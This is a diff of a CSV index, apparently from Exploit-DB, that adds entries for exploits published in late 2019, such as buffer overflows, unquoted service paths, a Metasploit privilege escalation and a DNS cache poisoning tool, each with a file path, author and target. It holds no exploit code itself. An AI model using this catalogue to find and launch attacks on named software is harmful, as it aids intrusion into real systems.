@ -6584,6 +6584,7 @@ id,file,description,date,author,type,platform,port
47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows,
47565,exploits/multiple/dos/47565.txt,"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation",2019-10-30,"Google Security Research",dos,multiple,
47578,exploits/macos/dos/47578.c,"Apple macOS 10.15.1 - Denial of Service (PoC)",2019-11-04,08Tc3wBB,dos,macos,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10741,6 +10742,10 @@ id,file,description,date,author,type,platform,port
47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,
47570,exploits/windows/local/47570.txt,"OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path",2019-11-01,"Sainadh Jamalpur",local,windows,
47574,exploits/windows/local/47574.py,"Aida64 6.10.5200 - Buffer Overflow (SEH)",2019-11-04,daejinoh,local,windows,
47575,exploits/windows/local/47575.txt,"OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path",2019-11-04,"Luis Martínez",local,windows,
47577,exploits/windows/local/47577.txt,"Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path",2019-11-04,"Gustavo Briseño",local,windows,
47580,exploits/linux/local/47580.rb,"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)",2019-11-04,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17748,6 +17753,7 @@ id,file,description,date,author,type,platform,port
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
